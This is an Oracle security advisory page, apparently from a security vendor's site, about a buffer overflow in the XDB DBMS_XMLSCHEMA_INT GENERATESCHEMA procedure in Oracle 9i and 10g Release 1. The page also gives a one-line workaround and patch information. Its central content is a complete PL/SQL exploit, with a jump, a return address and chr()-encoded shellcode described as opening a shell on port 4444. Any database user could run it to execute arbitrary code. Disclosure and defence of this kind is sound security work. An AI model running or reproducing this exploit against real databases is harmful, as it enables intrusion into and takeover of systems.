Red-Database-Security GmbH is specialized in Oracle Security

Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap

Buffer Overflow in XDB DBMS_XMLSCHEMA_INT in Oracle 9i and 10g Rel 1

Name	DBMS_XMLSCHEMA in Oracle 9i and 10g Rel 1
Systems Affected	Oracle 9i Rel. 2 - 10g Rel. 1
Severity	High Risk
Category	Buffer Overflow
Vendor URL	http://www.oracle.com/
Credit	Ariel Matias Sanchez
Exploit	Argeniss Security Advisory
Date	27 January 2006 (V 1.00)

Details

Oracle Database Server provides the DBMS_XMLSCHEMA_INT Packages that include procedures to register and delete XML schemas.
This package contains the public procedures GENERATESCHEMA and GENERATESCHEMAS that are vulnerable to buffer overflow attacks.

By default XDB.DBMS_XMLSCHEMA_INT has EXECUTE permission to PUBLIC so any Oracle database user can exploit this vulnerability.
Exploitation of this vulnerability allows an attacker to execute arbitrary code.
It can also be exploited to cause DOS (Denial of service) killing Oracle server process.

Example

   Advisory: http://www.argeniss.com/research/ARGENISS-ADV-010601.txt
   Oracle version: 10g Release 1
   Platform: Linux
   Shellcode opens a shell on port 4444 from www.metasploit.com.
*/

DECLARE a SYS.XMLTYPE; -- return value
AAA VARCHAR2(32767);
AA VARCHAR2(32767);
BBB VARCHAR2(32767);
JMP VARCHAR2(32767);
RET VARCHAR2(32767);
RETT VARCHAR2(32767);
SHELLCODE VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA; 
AAA:=AAA || AAA; 
AAA:=AAA || AAA; 
AAA:=AAA || AAA; 
AAA:=AAA || AAA;
AAA:=AAA || AAA;
JMP := 'BB' ||chr(235) || chr(09);
RETT:= chr(138) || chr(153) || chr(255) ||chr(191); 
RET:= chr(219) || chr(176) || chr(10) ||chr(08); 
SHELLCODE :=chr(41)||chr(201)||chr(219)||chr(201)||chr(177)||chr(22)||chr(184)||chr(37)
||chr(84)||chr(39)||chr(117)||chr(217)||chr(116)||chr(36)||chr(244)||chr(95)
||chr(131)||chr(199)||chr(4)||chr(49)||chr(71)||chr(17)||chr(3)||chr(98)
||chr(69)||chr(197)||chr(128)||chr(93)||chr(190)||chr(90)||chr(40)||chr(206)
||chr(42)||chr(95)||chr(196)||chr(150)||chr(242)||chr(198)||chr(145)||chr(183)
||chr(206)||chr(121)||chr(55)||chr(116)||chr(131)||chr(31)||chr(80)||chr(107)
||chr(127)||chr(134)||chr(243)||chr(2)||chr(158)||chr(44)||chr(146)||chr(76)
||chr(49)||chr(224)||chr(12)||chr(229)||chr(80)||chr(207)||chr(49)||chr(69)
||chr(244)||chr(1)||chr(210)||chr(104)||chr(121)||chr(243)||chr(71)||chr(36)
||chr(57)||chr(125)||chr(134)||chr(120)||chr(219)||chr(176)||chr(201)||chr(235)
||chr(78)||chr(73)||chr(147)||chr(187)||chr(176)||chr(128)||chr(163)||chr(242)
||chr(183)||chr(227)||chr(20)||chr(15)||chr(26)||chr(124)||chr(122)||chr(32)
||chr(233)||chr(20)||chr(236)||chr(17)||chr(111)||chr(140)||chr(130)||chr(228)
||chr(140)||chr(28)||chr(8)||chr(127)||chr(179)||chr(108)||chr(46);
BBB:= JMP || RET ||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
||SHELLCODE||'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB';
AA := AAA || BBB;
a := XDB.DBMS_XMLSCHEMA_INT.GENERATESCHEMA (SCHEMANAME => AA, TYPENAME => 'longstring', ELEMENTNAME => '', 
RECURSE => FALSE, ANNOTATE => FALSE, EMBEDCOLL => FALSE);
END;

Workaround
Revoke public privilege from DBMS_XMLSCHEMA_INT.

Patch Information
Apply Oracle Critical Patch Update from January 2006 or later.

XMLDB

Oracle XML DB is a feature of the Oracle Database. It provides a high-performance, native XML storage and retrieval technology. It fully absorbs the W3C XML data model into the Oracle Database, and provides new standard access methods for navigating and querying XML. With Oracle XML DB, you get all the advantages of relational database technology plus the advantages of XML.

Oracle XML DB is available since Oracle 9i Release 2.

Oracle installs a HTTP and FTP listener in the database running on port 8080/2100.

Since Oracle 10g Rel. 2 there is also a HTTPS listener available.